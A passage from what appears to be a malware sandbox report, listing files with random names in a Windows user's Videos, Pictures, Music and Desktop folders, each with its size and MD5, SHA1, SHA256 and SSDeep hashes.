SHA256: 1b3ef8636f9949da2b138283f1119fcc6101d82020a8ceccc25feb456565c887
SSDeep: 768:/eWhYMbl0V8AkYKaJeXjNosB0G2CiJwpaMCFhuuXsufNhk1eV5AH:/eNaGJeiu0G2F6jZQQH
False
C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\JCuda3TbU9_aKKvhOer.flv 56.14 KB MD5: d2019949101b2be020e30a8c4a8305f2
SHA1: f6b9c2ff111363fde126213795a07bdcb7a37d69
SHA256: 2570d4bc6a25fe6f3748bbbe8e76cb1011badae00ba225fa5cf105c1327857e3
SSDeep: 1536:sQvy/0DNv4zxCpUzmeqI9r5n4Wm5Kg68RFUgJG:sQvojzEImpkrlGK78LHQ
False
C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\qkjB9QUudeJrk jkCRq.flv 70.77 KB MD5: 0a02f08affb2ceac6ffaad2709e9c495
SHA1: 9928c66d6bf7827a0186ff1c3dc9410c52c0a52c
SHA256: aa6fdcf605a3b62d3bd629255852194819f919b09b6433881ef42ad745979722
SSDeep: 1536:RTwPsT18CmpAe7fjoNSx7UFS2/F+1utGESencP:uPsYLISx7UFS2/FOutGvecP
False
C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\rjtTtY.flv 74.94 KB MD5: 6ce3673002d85f78f70571a6de7beb00
SHA1: af95ed484c19cf797a434425bea13a40ae8ec433
SHA256: c66b562653fd517e817b52c020b74421e8a99ac6c7c37637f6d734290b039a60
SSDeep: 1536:EERW2o721u68Z192d0QG1oovFVWrmgToc7BYoNJK1kns:ED2f8Z1+011ooLCFNJK1F
False
C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\X xmY.flv 49.88 KB MD5: e9b7d63a588256520f697604319ac108
SHA1: 1a06cd9380cb3424317bd8c0cb9f06d8f3962516
SHA256: cfe01b713708ae6e5f63e55e6e9c2e903e9aca8b8d7b57c8fa6c153652d6ee2e
SSDeep: 768:OjgrfUm3/pKPcRRjRhJldtMVOeMstASFvrMXYc+4lkel5qTyZ235jm+3Ig+7QYx:4grTpKP4RhhuVn8SdhClb5cyZ23vs
False
C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\K8H_yKdZxq7njjSb.mkv 68.45 KB MD5: 073084db52cb5e9768026705d755fa3b
SHA1: 0fe8a2d49fa352c8e24ea7a4f71913fe110aba6c
SHA256: b6afc90307081b63e41ca8e7f44b98a212449752991a6fb16db1779d27496812
SSDeep: 1536:JGfFb34KsSP+WYqnCw+/Ac4oFaFLYUphw/H9TG5ksnKTd:sfZ4KsSPeqnyAc/cFEUrc9sq
False
C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\TaaSYvvFHS17rq.mp4 56.42 KB MD5: e73ba56cebaf9774b9ef8bacbda0975c
SHA1: 28c12b4887ac479d3a3cfcaf0dd11e598960457e
SHA256: 55bb218271e0d32bc6289d23111f1b00606cbab192a30975b524ea9757dc30d2
SSDeep: 1536:C22skneEld7sVR3Es2SH/LAkoAkg6ByoygFk:CnsKsf3EGTAko1nDk
False
C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\_Vz8dSb7ILROS.flv 4.52 KB MD5: 2f827f1accad5dfa9bdb07009b34cf54
SHA1: e9170930a3ff30d42b545d78df97088edb129ca1
SHA256: 2b5f8df679be60834cb7c4d0e92f37b42cc7eac3eece60489751a111bef76bd9
SSDeep: 96:8StPWTbf3nbpbC6VcD0f9P+XaBqu4gCweEec2A1kOT8:8HfRVUkmdwegh8
False
C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\ZcGza_BmC\wyauoDThVWGo4KOPbrPe.flv 25.50 KB MD5: 8b957852aa744fdbd4f70afa2aebad93
SHA1: 77ebcc7db8939ff052b5468c99f3f30e4fcf09c8
SHA256: 5ec485087908b540a569a915b5e4fa7fc501f1c9bf26665b0590787c39a36087
SSDeep: 384:2VgXa2WtcJeUCXb7sNKEkZsY8lApS9ING3Uga2LRlWR5XG54+3:2OnWaeUYsbhAOOG3UL2LRQRl+3
False
C:\Users\FD1HVy\Desktop\ids.txt 2.24 KB MD5: a970cb2a20a1e9be55d965e58966f5c1
SHA1: 4e26b5ee454f61ac7353b2ea0dabce4ec955aa47
SHA256: 2b8022f845765bd93621cbe75d576128b8e7837b490e1c294edc4480123e4a87
SSDeep: 48:XVWv1rQ2u5aRMtc77DxyRmI3S6QM666j2:XarQ35aRMtQN0n3S63666S
False
C:\Users\FD1HVy\Desktop\ids.txt 2.32 KB MD5: b06563f64504d44c38e0447508c4011f
SHA1: fc65012e5e778fa8d499514e53e32aa655f7d5fc
SHA256: ab98991b0a932bb08298ccb0b24abe90f7b06406401ce7f7ada47e8daa18986e
SSDeep: 48:XVWv1rQ2u5aRMtc77DxyRmI3S6QM666jI:XarQ35aRMtQN0n3S63666s
False
C:\Users\FD1HVy\Searches\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms 1.59 KB MD5: f7957b19f7d63e399a0b49b9cdd87489
SHA1: 66fa089f5d1a569a2470c5d50ee082768b2359bc
SHA256: 20bf3f4e87af0cbdce8d048fc3989c656fad0b880c638cb50211a2c21be249e7
SSDeep: 24:toPNxxwNKQIL5cxdCeyLw0+7zkKkamGf1TvGigq2HOCAtwz00N/r1+JO7ad/gv6V:tQw6u70+7gxj4vG5q2HOkz3Rr1kO+6zo
False
C:\Users\FD1HVy\Pictures\0P3NBwM7Yaa5LdwVnoJJ.png 25.58 KB MD5: 007b7b8c73d26a9cd133af2b77315517
SHA1: 9cb4a155f30dc32f431e385b74c5b694bfb15c99
SHA256: 8b348c8da5a387e88e78a73fa217132e4d8443d3d53aff7a234bd5a1e52c37e9
SSDeep: 384:jm69ifR+ho7fqOULkjaIL9btSDdWCY0MoXarRGBpYSRGNNXYXjcmqi:jm69Lij3ULkjN9btUM3RGrbGNNoT5qi
False
C:\Users\FD1HVy\Pictures\3WV0Ls jiLUSjUUco.gif 69.55 KB MD5: 2e3643f4a646f03c67c42343696208e3
SHA1: 4a316bdb44b3924b4870289b62e10c4acb9edaa5
SHA256: e4ecc72f047e8715b3bf0880c15d19cbb96b9936688552ffa9dc831a897e599f
SSDeep: 1536:JCIHY6/ajTo8zxc4MAE1cNw8+P6sJBMH/tGM0iN4ivWJH:JLi/oCxcZAwcm8+P6GMH/td9eJH
False
C:\Users\FD1HVy\Pictures\5_uNa_SA36f77jy3w2Gv.png 59.31 KB MD5: df805a1ef4ce45b3431b33e623b8b0e3
SHA1: 06bc28030383eb927f87564941946f9dbde4348c
SHA256: 4cbaf69a05e9acf03a2676135a8cd22fb82fb7d4dcc590afe7754db10d1120fa
SSDeep: 1536:BZhA6FedQ+STvXPsjtvJbpy1+aR1oiCvIO8FBve:BZ26F9++XPsjte8aLoiCvIdvve
False
C:\Users\FD1HVy\Pictures\6iyFgn9SrZHQ KGFU.gif 85.86 KB MD5: b9289569ec4a3dbfdf8c2478fd0c08f3
SHA1: 7844462ff62a56988ea57deb6ad835730c3c3a04
SHA256: 6f7f6be49ef30059e1dab37a87cc3bf11b7423a7311a1f9f2a5117a43fefad1f
SSDeep: 1536:Q75zc0ctYwzsTkaoXghXXqEYcQTSqGb1sIoo4XFC59q0mpU5VDFIpdFbwD/3U:+c0eYdTkkJmSTbu7XFCNmeD93U
False
C:\Users\FD1HVy\Pictures\8IrExsVsSnK3.jpg 8.88 KB MD5: 17bf81abf76a10368a2331f230510c88
SHA1: 1ad939da5b78af06ab346999e95c38ee26104cca
SHA256: b7726c3d76840b939f3ebe3e994aea13115091b54d556733b292561449813cab
SSDeep: 192:XIdTnKHAoPhBHRFqjpVli4AFBnA2uVwL+ykeMHg1uDh8:XIToPdFapUFB/uuSykerui
False
C:\Users\FD1HVy\Pictures\8ZHyFqvR363JEtV.png 48.02 KB MD5: 38a18ab76bf25405c57de1bc7629f0c1
SHA1: f46f3178160457ed868a2c5cf1e18866f92f355d
SHA256: 6340a39b32feddb236bf01167467a8228dbaf32a3843ca7b66b5c76600a14ff5
SSDeep: 1536:1ycQPQivnJx5EAx1eYwwJ4qacLxDszUw5th+zDiL44z3ve:1ycQP1vntP1eYwwi6yQw5OKPW
False
C:\Users\FD1HVy\Pictures\C876_Q.gif 58.20 KB MD5: 0866f20b4216cb299e2519bcffbd8624
SHA1: 831ab4297e998e8fc51c043c892052232d1a4fe9
SHA256: a4e31abda9d806ff2ba11bf4222068c50d529d97c416c8b7e8f51402610838ad
SSDeep: 1536:sr6FVcGQHVCx7qKRczeS+P4im8qUsvGiy48ldQYIS3M:sr6F14V8X+N8lsvGiy4eCAM
False
C:\Users\FD1HVy\Pictures\ES -V29.bmp 48.69 KB MD5: 831eb587c638aaf85e219d6131df0aeb
SHA1: 1c38b44e48565250fe92d059eaba329857b4fffe
SHA256: 51de86d868189a5ea68b28169902704c4b85cab6246a8e3a03ac79d1e790fcf0
SSDeep: 768:Owbzv27tQE+2ycwmmtEtWA+RFNIANnlnt7VvPUPZtmoz8iPIphmfuQaS22:JG7b7yc9mxvNbt7VkfmO8iPIpq2F2
False
C:\Users\FD1HVy\Pictures\f5nrkb2LotgtwH.gif 19.12 KB MD5: fb0a5e321e0b0c0945013d32d1696566
SHA1: f3c56b5c29cd28101b03843cb257f063e15abaac
SHA256: 4b2fdca57968de20d14e268776e6101dfa20a3ca074b8c10bc55c84f78a8ae3d
SSDeep: 384:6ObdZ3qgMNaI4FYnXpRNHw3NcBBaVazAR33Fpi/8SZW5wO4ZOTLYpb:9RZ7aNHw3NcG3RnFe8CO4ZOnEb
False
C:\Users\FD1HVy\Pictures\FCOwn.bmp 33.09 KB MD5: ac0e1e20c154e070f659acc298a4982e
SHA1: 261e9bdc5ffeff21ff68baf5042f22a9901cffae
SHA256: 260a22989f911c018a7347480584b75914916344bd0aa8a14ce5a77178f1a21b
SSDeep: 768:emU/wrxW2r5rlZiqXRW2g1iti7aiA1dYRwt9F4Y7aue/roK2:emLrx3rzZiqXvg1iiXRwtT4Ym/r2
False
C:\Users\FD1HVy\Pictures\FgcCERd5K.gif 12.05 KB MD5: 00f4d223c174fe61d89a338acc69f4c4
SHA1: 1a57505b2cb352a9af7e406a3795fd9e22cb8862
SHA256: 60331a3942b1bcdf53da10b2b757ee6b068c22638b12f0aeee7d5b3fb860abab
SSDeep: 192:Cr9Ht7Ib34PlU0zQv7RQSuosLeWFew6MAKJPydZeAkR/OaG8W2o2X3h8:Cr9HMylOMoiZehMDPQZeAkR/5cX2Xu
False
C:\Users\FD1HVy\Pictures\fJ6HL8oLrkhks9adl.jpg 72.28 KB MD5: 271705370e1f025e54ff060308291549
SHA1: 33117180f5fa28c593c5c4b323c511f5556335bf
SHA256: 3fba8e64e4e6237950bf019c4144ae070368d48aee87056799d2cbdd15e01223
SSDeep: 1536:Tl9fBvaBG1+Ye+AdZXs6LMqr2R/AS0V5597wUJ+0hRqLcW/VL8g0x:nphFV0UAR9vWgU0x
False
C:\Users\FD1HVy\Pictures\gTPmnYJT.gif 75.20 KB MD5: fa26b1cb61fac12538e0c90291630803
SHA1: 42b60b54844bb22b2de4e49828568e4013d06691
SHA256: a229cd969e8a7e8a5fac135429affd70acaf08e5e0d4a7c579d968fb1b67f329
SSDeep: 1536:4RtbA/KAQjvzlRlK9wUo8nZh7dT8mo+YX1CGkeFkPBjtenHeVv2Yh:4bPAQjv5awUoK+mo415VuYh
False
C:\Users\FD1HVy\Pictures\hsN3S _.jpg 5.67 KB MD5: 743f40c0e7ea5523ffa57784376cda56
SHA1: 6ca38edf8d1020b61fa18adf51c751ebc5fc30ff
SHA256: e0a69d7aedb55b9ce7d450b3365e9687a91d7f56fd89373e9acef3c7f161dfb2
SSDeep: 96:kyLqPRjzekafMWhWoSug7h3X9hVJlBPG4gIt4wSETvAyX57UImnOZn6zUD1kOT8:VSPaUpoc/JTtgevABnWh8
False
C:\Users\FD1HVy\Pictures\Hsyb4EvKfZDCo8.gif 58.56 KB MD5: c50763ce76a8279db1682e5528fd3137
SHA1: 26176e8cc702e12b441989ceda8510cf7668e2e6
SHA256: e891719bb96988e208a025f69113ef9cc5eb05913c3336b1d23c179da9800c7e
SSDeep: 768:v6VyBA7N9Yo/c0dADovnJxh/86JtU8qCFyfXDjL7BVFOSy4BGOk7Mq1C1/BZ/5:24Eco/c0RHh/86JthyfzjZVQsGVMq1YR
False
C:\Users\FD1HVy\Pictures\i2jPXe_5_EmayX-juQ.jpg 84.52 KB MD5: d039b7d56e366e3817272bf33f51d347
SHA1: e84cb0ba258fa0944d9a4478d98f91c7d05b89e3
SHA256: 47dcf34f760b828fbb63cf35599a2e35ab66d229f673332839d1a115a49089b7
SSDeep: 1536:CqevWTL4gopjpe1pOrj+YWoLYs8cY0zDYX837uaY26:veu3UTD+cecD2faS
False
C:\Users\FD1HVy\Pictures\iJsVEnd5y-jq2.png 100.11 KB MD5: 92734fb6c8b61756f044a74a949aa38e
SHA1: 6ebe11526c250030f2108292e84ab4827dcef2a7
SHA256: c7ec515d0c31032716d8001acaf18a247afa23b0958e95dfd1010f39f2aa4668
SSDeep: 3072:SARWbkjn4eN7K0vzFFnnh5hqzlQy566aOd:zRWbkj4eN7K0pFnhyBraOd
False
C:\Users\FD1HVy\Pictures\iKlWqFav.png 65.42 KB MD5: d76e7dc7056361d887df129a0af84094
SHA1: d0d88e63e1700e7d5b8bfe1468d7278c5ee76d89
SHA256: 1ee95412dd928298b48295fe181f6757b21df6e35560c62f4e287bfc75b4d787
SSDeep: 1536:SbkzXX8868NYeknda0R0XO7aX9kS0Ys7AinH5fnJ28sp5S:SQz88TWdONkSsVHNJkY
False
C:\Users\FD1HVy\Pictures\JHLKfbZ_wnxI.jpg 91.34 KB MD5: 53617ddbfb786829e6e2a8857d09ba79
SHA1: d454e8c1a534a279aba8ae65aaf53b3a11687dd1
SHA256: 626b1527b513b0939196bbd8d4f92d144c4a99134c1ce4c0eebd907492493314
SSDeep: 1536:ziq4eNdY4aBUbE9ceFqkS5b39K3yRNBnB4jJzMjf4zMsDXnzUtQPhwfPzOzXs:Oq4evYrBUw+d9K3+B4C4g8zUX3zO4
False
C:\Users\FD1HVy\Pictures\jTcjMuk8-c84cV.bmp 27.17 KB MD5: bf610d7d7e1320efcdf26ef0c2315b39
SHA1: 24304f0bd9b1d07d702c397fd5e6db89a5e7694a
SHA256: ad0858f56a0f564b132bc96982bb4d2dadb7c02d4422f8dd6cb0dcf9f0f79a68
SSDeep: 768:y4tLT4FmiGzoWEU5gZhiXr/OnkntOLrbAZgSJvs:y0H4FSzoWEPG/ONANBs
False
C:\Users\FD1HVy\Pictures\LkpzuM_D0mU.jpg 51.02 KB MD5: 546a0ca9d1cb517251e87444b95236fe
SHA1: 2df8e5644616ef305bcea6e56f7c35367cac2f8c
SHA256: 9bebc3c8691d350a77bbd798878c8bf522ca2011b35e6b0a314cbc1fed193337
SSDeep: 1536:z/PUEJTlULSRo8mUgzYn1Qnk0j2bE/mixq:z/f0+RoBzG1ij2b11
False
C:\Users\FD1HVy\Pictures\M6y8KiMnNaGEd1.bmp 74.91 KB MD5: 6c5dd26ba137bd2d7d0abf5fc975cfca
SHA1: e99f880f27bb5b0ec1f93fa3273688d925af5532
SHA256: ea82fd5556274009dfba8a9065833f3084ed5da706b1ca0df5b580b77bc28a12
SSDeep: 1536:7PHCXGmWaZ1flNGzviCY33a1yc+dCxzcWlWjN/sJYNw:rCXfWaZ1flNGrbY3ajgW4Nw
False
C:\Users\FD1HVy\Pictures\N0NZDmMYf0H.bmp 48.72 KB MD5: e24b5b8d7cf211ae1a01d2a7172c65af
SHA1: 86c62ce9197c75cdb06520c3278e2db01248bc1f
SHA256: 91c5bf25b8781296ab847f06c7a770ac1afe4a1e818252933f33b5ece67e378d
SSDeep: 1536:PWLAcweprTehH7j15iq9hOx59RY82kdst7W:1cwgTYn15iq9hOx59Rd2kdu7W
False
C:\Users\FD1HVy\Pictures\nqh87aP.png 70.03 KB MD5: 02e378525609105b1a732dd2ab9e5353
SHA1: 88f454da1a88b61776400a958d690711fea3752c
SHA256: bf30ba6a7d99c315b541412e925aa01575c24de4f6d45c612046e9346ac47239
SSDeep: 1536:MIfVJOQ96+22/x9YMuCtlIypx10CXy9+vpArM9wJMqzSxMh:MIdJ/8+hNuu1+I2JvOxMh
False
C:\Users\FD1HVy\Pictures\qnFyF6.gif 63.02 KB MD5: 20d52d8e1cc5f6052cff3aabb383efc5
SHA1: fdb0312fd1e4eb75f218809f4495f8c9e97fd96f
SHA256: 6eb6e881d0bbfca217f81e3246840e9cbc764b57d02f3adc3b32745448e1fc92
SSDeep: 1536:Ey1+J8F5CryLqha8pZh/sT+f2g4kIY3oV1WrHY:uJ8AJLh2gnIazDY
False
C:\Users\FD1HVy\Pictures\QYkN2xzet.jpg 69.34 KB MD5: f4ed58d886fcb84741bbe84ea6c534cb
SHA1: ff9f3240161955e31e1dd84953823a4db5df542a
SHA256: 9c62eda0526b4aa4909b6991474ed5653727eb0f4f5f469f113d10491d100a02
SSDeep: 1536:u2v3cSdZEoK3miQeBbkhUdS4YAjjkvujk6+2ILuJO8rpg3EA:ZPcSdZEosmiQh+TjjRPxO82
False
C:\Users\FD1HVy\Pictures\rL58t9UpNE.png 13.31 KB MD5: 475318db33ab50710382ad23afa3dda9
SHA1: 1356a4b23b2f8557cfa296ad7bfc642a87fd728c
SHA256: fd358ea44154f303b575c13f912dd29a39408847b25fa9507c98e84de3b4f676
SSDeep: 384:gVFA7/K7c0kHY+bqUcivOiOFHFZe3xvsPXU3:gVY/K7nk41Uc6EFHFZrPXU
False
C:\Users\FD1HVy\Pictures\sg1EYYvYbFWAigsa.bmp 36.66 KB MD5: 61c2a4fe7c22850555cd72bee3ba798f
SHA1: ad349f8aa6efc5b57510c719b48bc1b834186889
SHA256: 67cde71e249b16d16ef5105dcd62e3561b92e020759a31b53e17c640dd56a5c8
SSDeep: 768:k2O+rajoa+1WYcwVTJTycN622/48jjmvpi7N8:I++EaX6Vgc88c8
False
C:\Users\FD1HVy\Pictures\Sghof7ewON_UNTJ3.jpg 93.86 KB MD5: 4b18685bcdc7f3ed5069f9af1f5b6ce7
SHA1: 6bd62a7f1c5b069debab79a9e9f6a7b9bdea0b84
SHA256: 71d0bf2229f2db6af769decd873545472f289880396bd1673f1fdb380a641065
SSDeep: 1536:OJIaq5GynzWHR6QTrfGeus7uNkEMUCy6Jtg0FknwHP6JoXMw4x6q9Gv8:Baq5GyCrfJuCE7GJCt5JoXo6q9GE
False
C:\Users\FD1HVy\Pictures\SJe4.png 32.89 KB MD5: 2ec24833adf5e87c414a789984f075a7
SHA1: d82bb79bf0ed0412797630b875089ad02d68db00
SHA256: 6ff4ff84ee1c2a2d36816fe994188d84fe5c542b4d88f2a5b7df468dc18a45fd
SSDeep: 384:9zCEEjZCCJysdn4/3s1aP4I6LxHy/wfT5Vw13vHuT9cgOV52ef1ggYoemc4qbQis:9zBCkiv1mfWxgwftC13M/OSgYorLis
False
C:\Users\FD1HVy\Pictures\snTK_4Hws.bmp 15.72 KB MD5: 157db0b49e03228b7e84b887ac62b90c
SHA1: 9957ebe9f14bc6eac06e2c26133aa4bac33cab4a
SHA256: 17b66c9c9abd7dcc70b13c63bf44079f1d7a06293fc0673a90fad9f538a5e625
SSDeep: 384:iwhr3dxPWeRDfwQjXxhsihml0XvOd9k56pemLgpaR7w:isDHuei0xhH+6M1EmLqaRs
False
C:\Users\FD1HVy\Pictures\tbI35.png 67.64 KB MD5: 7c82a243a13c79cfee91a25e39504fc9
SHA1: 894c6d24bda5964b447c97dba00dc83b60666cb8
SHA256: 3a2172af9499a47f90fc8db89c9617283f3eaedc5ed2e0c8077c151f8ebbcdf8
SSDeep: 1536:AR0OpBHMyfFfgr9BUTUqGXXXHpddUWRQ1mrJMeakJXwqrAgmMjJt:6TdMyGrUTUqCXJjUpmJXakJA6eyt
False
C:\Users\FD1HVy\Pictures\ugR0riRG8ulCowNjMAqj.jpg 62.67 KB MD5: 7fc947933259d4f8b0e11c50a0073b9e
SHA1: 8d041a2e4e11b3bac45aff17fc78c3a7fefe13d9
SHA256: 824f6a106bae724e3293e3faf02ac03ddfd3274a66182454360c4ba52b977912
SSDeep: 1536:k67yvbYnrzp1RS+WvK6ip8A+vMHEjMU1UKsQ/7s:YjYnrzxS+WSQTvoEwUGKJo
False
C:\Users\FD1HVy\Pictures\xAWhA3CWoiGQ4.bmp 47.75 KB MD5: acdb5365cd0aeb27256b108db52fbec2
SHA1: 88cbc60c7b62546521d5a44edbeb9157ba38f141
SHA256: 5076ba3877c4abf323f887e34438be39a953b20524b36dcd855561313c724a27
SSDeep: 768:3qZFb/FKr+bJhERMy/HgKv8uAYIsvQXk13Om4m6gkXII9EpebMVoi2ncE/Znc6EG:4+r+tuRZHlLIV013O/OkXNEYLi2XZ3wU
False
C:\Users\FD1HVy\Pictures\Xs85b.gif 41.61 KB MD5: 82c05db646c21b439296da0fd3f6f1a0
SHA1: 2edc27bd264b8132f2bad004067e6e898b4c9f5f
SHA256: 601e6f3785781870ab16bb7d651258320f1459172689e24fd1e555eadb0df428
SSDeep: 768:ylyifecJwcVB5vZ3QZPrJhdKJ2dI2Rj01madOWg1cFseDzJNTjzHbD71:y4i0SB5BgZTsOIW6ewJND71
False
C:\Users\FD1HVy\Pictures\YJvAER.gif 57.91 KB MD5: ae660b759c3d7d1bda48f7571fcc823d
SHA1: 297e04377025c567ba558e0f96aade6360d28c9b
SHA256: 0013ab92ab1b4b4864aee4e010497a28c0dbb9f79b4b09b1453ac7fb72670dc1
SSDeep: 1536:lI6EuuRfTsKllD+CtorlMrUl8RwbpAOJvIxieDqaD:lYvlcC+pQ5R42OJvoD
False
C:\Users\FD1HVy\Pictures\zkGa22a5xC9Cll9U.gif 13.67 KB MD5: 49362956010f971722f77be9813f2225
SHA1: f727af8960fb75261b54e2d9eb9a36a317f57de7
SHA256: dc1230844cf05e1038ca453f0878314f6a147d9da1a087f7930d52f61f1c5832
SSDeep: 192:u6BJXMglA8PueA1Bn6ENP6WAI5cdmgnzcXpTJgaOmo2cWzNnoPU4zMPJDhQrGT4s:PAv1BnxPrgnkTKmJYt4hQro42Z
False
C:\Users\FD1HVy\Pictures\_gki25reI.bmp 8.84 KB MD5: 2855691603a8f443ab83cbf03bc51ae5
SHA1: 65d3cb8fbc23913b5db8210a1d14fa117a5e7e6a
SHA256: c090eb731331b4812df01c5f56f23cc95344b140e391d193d6084f854a6bca3b
SSDeep: 192:Ocp+Mx4Z3ucilD3Fq0eDNrfdnHpqhafu7IQi/dD5Y2xMvt8Ih8:J6+cyBq0yfdHpWaWMVh6vt8t
False
C:\Users\FD1HVy\Music\14B5f5HX.m4a 48.84 KB MD5: c9c8bad3dd2bf1ab532cc5c14c2cf53d
SHA1: d2f8636738e7f60da47f4db2fb0439942b9e1fe1
SHA256: 3f131938c1aaac8552b843957dc0ededc4179c5c570bd942d45566c98db71848
SSDeep: 768:VQdYwN+St/BDfPLVe34SxuZ0HccQDQQNOSYc2B9t8oupH3ojWL+JowI8XTNJx2Vs:VQpl9p3Lo4o1FQ/NOzHuZgIeHdJJx4s
False
C:\Users\FD1HVy\Music\epqIgxA0WzcL_N3FRi.m4a 49.47 KB MD5: 916ab49959c8587772938e373734db98
SHA1: 92ef4a314d43672bcf84babfd29410c22f8cf048
SHA256: 3d05a4a388938048eaba870e31c6a768b14894313d9a821df8528d950d88325a
SSDeep: 1536:mzFFjj89Ib/E2aj3t6ndP4bB9h1IoQ/x2ohmQdlp:mzDjjmIbM2m6nqbI/xDgQ9
False
C:\Users\FD1HVy\Music\ivAqh4BdXoB0En.m4a 60.05 KB MD5: fa3fe7b14634d7df8ca39b97ac2c001b
SHA1: e96fbf52c84edf55b7064cbcedf7e66af2a9b688
SHA256: 2e460d47fd9e88622fb07d87468aeeb0dc3c3a78a909b235573815ae28cbf29d
SSDeep: 1536:j3xi5drklzMtf+O7+XOiVnZhTDgmC2NNqzmxD8xa14ch6whso:DwdwSX+RhTDgFWN2mZ8xa14chZhr
False
C:\Users\FD1HVy\Music\pKN8kzf02i2Z-2YwQdYf.mp3 95.58 KB MD5: a5e97a64ccf897e82fa903b293bb1166
SHA1: b34a5e460067391f695a2a79f5a20e8a1ee82829
SHA256: 1a0834da053da124c3df4fc6fb6cdb9dcbc09df5fda0df0d3d78a96ea08384ed
SSDeep: 1536:z1Ii1umx4lc7ugzHrdRKKLgodqan2VGYCpWOAzDgtTup5xgY:z1F1Px216KwdqanOCAOAz6Tup5xgY
False
C:\Users\FD1HVy\Music\XaND DoJCBA3Xf.mp3 22.33 KB MD5: 50ce59cbf8840637e77ac6e5913d6862
SHA1: e14a88df897f434d37fcc507e9ef7a533152ab83
SHA256: 388b6c24c9fe6cb5b9b92981989b9a1a1c45b5b7d9509641d20f16f7832d2e9c
SSDeep: 384:vrs5qugWqX3yyJA7D6PpZFdD+Gg9keOt6zOePEGRd1veTpgUO8Wfo0OXjES5jjJd:vIYRTPpDdG2vt6z3R7ffo3jtNHDdv
False
C:\Users\FD1HVy\Music\_MAxegZNMc9ssCROLe\rsJ9UPU.wav 55.30 KB MD5: 1be61e0e074eeb58a1e81a0e610cacb5
SHA1: 24f57c0954858e73fe93e86921dcf15ae9088743
SHA256: 0dfc25618e1798301dec71150d739bb8f0eed828035e36ee4490dddf54fd6c26
SSDeep: 1536:RfoVc/LLYdpRXTE6AXiuU6P7zLSPVaEgKKZr:18RdpdTE6ASupLSdrglB
False
C:\Users\FD1HVy\Music\_MAxegZNMc9ssCROLe\wXxWLXtHA6IWwzbkTvK.m4a 10.78 KB MD5: 4b68eaf720b6ce5790a1ae127381a77d
SHA1: 9f8e02ea1ab9f0a31577e465d0f01d11aaecdf8f
SHA256: 27a560bf312d8c5118485aaf6b39d6964f4f34be31a013c5642c21944f96d2b5
SSDeep: 192:eKwGXPUj9/wSOQeCpwwoJ0M2kCbyXvh4kqL3JmTveeMCuNKcch8:e9m8jJwrQFSwDkC2Xvh4FrJmTve5NKc5
False
C:\Users\FD1HVy\Music\yxGMwmgC\dOlY5mI8x96ejt4.m4a 1.95 KB MD5: 87b1f0b2012a70f9fc0507d7c2bac221
SHA1: 656f00266f72366fe0e7cd9e48e353a6a18423e5
SHA256: 0219f92256ec9dfbd81a330e02ad66e821130c4b1c46214d9f19d69eec1ad476
SSDeep: 48:x0+cUTcbD/bk67CLUvy+tT9uHQUuHrUwByNRr1kO+6zo:x0+wM6WgqHQU3wIb1kOT8
False
C:\Users\FD1HVy\Music\yxGMwmgC\hqVpFTG9IIW eeHIf0.wav 9.52 KB MD5: e62e8a345e129a513417c3c243086e18
SHA1: d837d67d1aed670b8272306402fc0c7e29bb79d7
SHA256: 85e9ae0b6873746c63f86bfc68224f279eeb6d64a9a133c15b2ec85021c4182b
SSDeep: 192:IbD0Qg8MOxerAObbPjHEhiy4196lFqj/mWFepeHBH/sN6Hnq4eWH4h8:Ij5vx6jP7KiBWMjNec/DKa
False
C:\Users\FD1HVy\Music\yxGMwmgC\iyvNor3BCpFxS.mp3 43.73 KB MD5: 0c8f1b138f41c73634e103ab0bb6b0c6
SHA1: 4c6cb190734c17790c3f36e288bc04b13dbeb65f
SHA256: b926c069b23e098daf84d984591a809a6e35ed610f1d99d6b4ace5e720a87456
SSDeep: 768:OM2ZOCJDJcGWH+Ol74axtUvzdzecL0Null+iS3HX7AVCWDctnMFiO3:OMWOCJD+PH+67vOzUvQ1S8VVTJ
False
C:\Users\FD1HVy\Music\yxGMwmgC\T4BI1N3Y4nE.m4a 48.25 KB MD5: 621d45a26145cdadb49ba2d5a9955d09
SHA1: df23274d7a74f39b3d01b3216623b99aaf195339
SHA256: 92bcf274a28ac51d334b922083ad1b61d9aa3e6b019b28568439e3b84fb9b96b
SSDeep: 768:5ahpayoZBGC9ScIlCB3EPNxF4UCpojruKtc88J7GQD/5oK+oITc2PH0sXN/PSGZO:5Wpa78CMZ0B3E1HiojAwQDhQ0s9/aGZO
False
C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\b1MCgDF7JU.wav 61.06 KB MD5: a96c2cf9bb632d930d4c50f1e8fc9c71
SHA1: 5f286540310589c50b85ff70140dcf0f6a4acd97
SHA256: 295adf26025eee3e38fdc3d919c5840f6ae9972d4c0a3fb9227e2705bdd46ccb
SSDeep: 1536:qXus9ZGpI7VKi0algZVGcKYlL/ndWPHpGfX:ous9FtCZNKY/FX
False
C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\RZMqfkHjGC7Ywnfi.wav 77.00 KB MD5: 0a796ed74d2cd57b6056e75f4895c7f6
SHA1: ca158da19b58e9efcc6b2dca9564440b3a2a03c7
SHA256: 217afdd11ab5c2f90e9a937957742faef8a1c75a3a76d10d59f8c0cd9b3caa04
SSDeep: 1536:M84wAljc+fVG5TaMlB1f8bgWE64quJdrzvjfeTl:MLAMV6B1kkWEhq2vjfa
False
C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\_9r81igxQbjAOcgmhEV.wav 12.64 KB MD5: eacc4472f0d4cd0e060f4008f90254bb
SHA1: fa0f85f8d72bfba67b499c31698b5a0fae854ebd
SHA256: 19ff4cb31a686fef6009bae258bae4b1950b7b179b9c8336140fc5f8f0d603a9
SSDeep: 192:JIAYFqWSOaZK2Wzm1etkVqRpdZ2ZLUOvdRr6/8wdujQorx83bR0DY0JxAAh8:JrWgKZzm2kVopK1z3O/8wAQKK+J+
False
C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\2FpKVPISO.mp3 97.33 KB MD5: c837e7f21f2e4eb5cccbf62e564cc82c
SHA1: 2b71fad7d1bea63774b280e7ec62d8900e0e4aa9
